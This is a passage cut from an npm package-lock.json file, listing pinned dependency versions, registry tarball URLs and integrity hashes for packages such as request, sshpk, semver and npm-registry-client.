"https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "requires": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": 
"sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": 
"sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": 
true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": "sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", 
"integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": 
"sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": 
"^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": 
"https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", 
"aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": 
"https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": 
"sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": 
"sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": 